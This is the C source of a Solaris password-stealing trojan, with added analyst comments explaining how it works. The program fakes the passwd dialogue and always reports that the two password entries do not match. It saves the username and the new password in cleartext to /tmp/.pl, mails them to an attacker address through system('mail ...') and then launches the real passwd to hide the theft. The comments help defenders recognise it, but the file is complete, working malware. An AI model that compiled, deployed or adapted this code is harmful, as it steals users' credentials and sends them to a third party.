/*=============================================================================
   SU Trojan Ver2.00 for Solaris
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (unewn4th@usa.net)
  =============================================================================
*/

/*
 * Analyst summary (derived from the code below):
 *
 * Although the header calls it an "SU Trojan", every prompt and message in
 * this file imitates the Solaris passwd(1) dialogue, and the program ends by
 * running the real `passwd`.  It is a credential-capture program:
 *
 *   1. It prints a passwd-style banner and prompts for the login password
 *      (non-root callers only) and twice for a new password.
 *   2. It always prints "They don't match; try again." after the second
 *      entry; the two entries are never compared.
 *   3. It appends "<username> <new password> <re-entered password>" in
 *      cleartext to LOGFILE and, when MAIL is defined, writes the same line
 *      to TMPFILE, pipes that file to `mail`, and deletes it.
 *   4. It hands over to `passwd` through system(), so the user then sees a
 *      real password-change dialogue.
 *
 * Artefacts visible in this build (all compile-time constants, so they may
 * differ in other builds): the files /tmp/.pl and /tmp/.tmp, and child
 * processes started through system() for `mail <addr> < /tmp/.tmp` and for
 * `passwd`.  Any password found in the log file should be treated as
 * compromised.
 */

#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>

/* E-mail address to which the captured password is sent. */
/* Deleting the following line disables the e-mail notification. */
#define MAIL            "hohoho@hacker.net"

/* Log file that receives the captured credentials.  The author's original
   note says to rename it to something hard to find, so this exact path is
   not a reliable indicator on its own. */
#define LOGFILE         "/tmp/.pl"

/* Text that mimics the messages of the genuine passwd program. */
#define MSG_PERMERR     "passwd (SYSTEM): Permission denied\n"\
                        "passwd (SYSTEM): Can't change local passwd file\n\n"
#define MSG_PERMERR_J   "アクセス権が与えられていません。\n"
#define MSG_PERMERR_E   "Permission denied\n"
#define MSG_DOESNTEXIST "passwd(SYSTEM): %s does not exist\n"
#define MSG_BANNER      "passwd:  Changing password for %s\n"
#define MSG_OLDPASS     "Enter login password: "
#define MSG_BADOLDPASS  "passwd(SYSTEM): Sorry.\n"
#define MSG_NEWPASS     "New password: "
#define MSG_RENEWPAS    "Re-enter new password: "
#define MSG_TOOSHORT    "passwd(SYSTEM): Password too short - must be at least 6 characters.\n"
#define MSG_MUSTDIFF    "passwd(SYSTEM): Passwords must differ by at least 3 positions\n"
#define MSG_INVALID     "passwd(SYSTEM): The first 6 characters of the password\n"\
                        "must contain at least two alphabetic characters and at least\n"\
                        "one numeric or special character.\n"
#define MSG_DONTMATCH   "passwd(SYSTEM): They don't match; try again.\n"

/* Scratch file used only to feed the captured line to `mail`; it is removed
   again right after the mail command has run. */
#define TMPFILE         "/tmp/.tmp"
#define MAX_USERNAME    200
#define MAX_PASSWD      200

/*
 * Entry point: plays back a passwd-style dialogue, records what the user
 * types as the new password, then starts the real passwd.
 *
 * argv[1], when present, is the account name shown in the banner and written
 * to the log; without it the caller's own name (from getpwuid) is used.
 */
main(int argc,char *argv[])
{
    int             uid=getuid();
    struct passwd   p;
    char            oldpasswd[MAX_PASSWD],newpasswd[MAX_PASSWD],renewpasswd[MAX_PASSWD];
    char            *getpass_sys(char *);
    char            username[MAX_USERNAME];
    char            buf[200];
    FILE            *fp;
    int             i,ct,l;

    /* Look up the calling user's passwd entry to obtain the login name. */
    memcpy(&p,getpwuid(uid),sizeof(struct passwd));
    if (argc==1) strcpy(username,p.pw_name);
    else{
        strncpy(username,argv[1],MAX_USERNAME-1);
        username[MAX_USERNAME-1]=0;
        /* Unknown account: print the "does not exist" text plus a localized
           "Permission denied", then exit. */
        if (getpwnam(argv[1])==NULL){
            printf(MSG_DOESNTEXIST,argv[1]);
            if (strcmp(getenv("LANG"),"ja"))
                printf(MSG_PERMERR_E);
            else
                printf(MSG_PERMERR_J);
            exit(1);
        }
        memcpy(&p,getpwuid(uid),sizeof(struct passwd));
        /* A non-root caller naming another account gets the permission
           error and the program exits. */
        if (uid!=0 && strcmp(p.pw_name,argv[1])){
            printf(MSG_PERMERR);
            if (strcmp(getenv("LANG"),"ja"))
                printf(MSG_PERMERR_E);
            else
                printf(MSG_PERMERR_J);
            exit(1);
        }
    }
    printf(MSG_BANNER,username);
    /* Non-root callers are asked for their login password.  Only an empty
       entry is rejected; the value is never checked against the account
       and is not written to the log or the mail. */
    if (uid!=0){
        strncpy(oldpasswd,getpass(MSG_OLDPASS),MAX_PASSWD-1);
        oldpasswd[MAX_PASSWD-1]=0;
        if (strlen(oldpasswd)==0){
            printf(MSG_BADOLDPASS);
            if (strcmp(getenv("LANG"),"ja"))
                printf(MSG_PERMERR_E);
            else
                printf(MSG_PERMERR_J);
            exit(1);
        }
    }
    /* Prompt for the new password until it differs from the old one in at
       least three positions, compared over the shorter of the two lengths. */
    for (;;){
        strncpy(newpasswd,getpass_sys(MSG_NEWPASS),MAX_PASSWD-1);
        newpasswd[MAX_PASSWD-1]=0;
        if (strlen(newpasswd)<strlen(oldpasswd)) l=strlen(newpasswd);
        else l=strlen(oldpasswd);
        for (ct=0,i=0;i<l;i++)
            if (newpasswd[i]!=oldpasswd[i]) ct++;
        if (ct>=3) break;
        else printf(MSG_MUSTDIFF);
    }
    strncpy(renewpasswd,getpass_sys(MSG_RENEWPAS),MAX_PASSWD-1);
    renewpasswd[MAX_PASSWD-1]=0;
    /* The mismatch message is printed unconditionally; the two entries are
       not compared anywhere in this function. */
    printf(MSG_DONTMATCH);

    /* Append the account name and both password entries, in cleartext, to
       the log file.  A failed fopen is skipped silently. */
    if ((fp=fopen(LOGFILE,"a"))!=NULL){
        fprintf(fp,"%s %s %s\n",username,newpasswd,renewpasswd);
        fclose(fp);
    }
#ifdef MAIL
    /* Optional second channel: write the same line to TMPFILE, run
       "mail <MAIL> < <TMPFILE>" through the shell, then delete TMPFILE. */
    if ((fp=fopen(TMPFILE,"w"))!=NULL){
        fprintf(fp,"%s %s %s\n",username,newpasswd,renewpasswd);
        fclose(fp);
    }
    sprintf(buf,"mail %s < %s",MAIL,TMPFILE);
    system(buf);
    remove(TMPFILE);
#endif
    /* Hand over to `passwd` via the shell; after the staged mismatch
       message the user continues in that program's dialogue. */
    system("passwd");
}

/*
 * Prompts with the string d through getpass() and repeats until the entry
 * passes two checks that imitate passwd's complaints: at least 6 characters,
 * and at least two characters counted as alphabetic plus at least one other
 * character.  Returns the pointer obtained from getpass().
 *
 * As written, the alphabetic test covers only 'a'..'x' and 'A'..'X', and it
 * scans the whole entry rather than the first six characters that
 * MSG_INVALID mentions.
 */
char *getpass_sys(char *d)
{
    static char *x;
    int         i,c1,c2;

    for (;;){
        x=getpass(d);
        if (strlen(x)<6){
            printf(MSG_TOOSHORT);
            continue;
        }
        /* c1 counts characters in the a-x / A-X ranges, c2 everything else. */
        c1=c2=0;
        for (i=0;i<strlen(x);i++){
            if ((x[i]>='a' && x[i]<='x') || (x[i]>='A' && x[i]<='X')) c1++;
            else c2++;
        }
        if (c1<2 || c2==0){
            printf(MSG_INVALID);
            continue;
        }
        break;
    }
    return (x);
}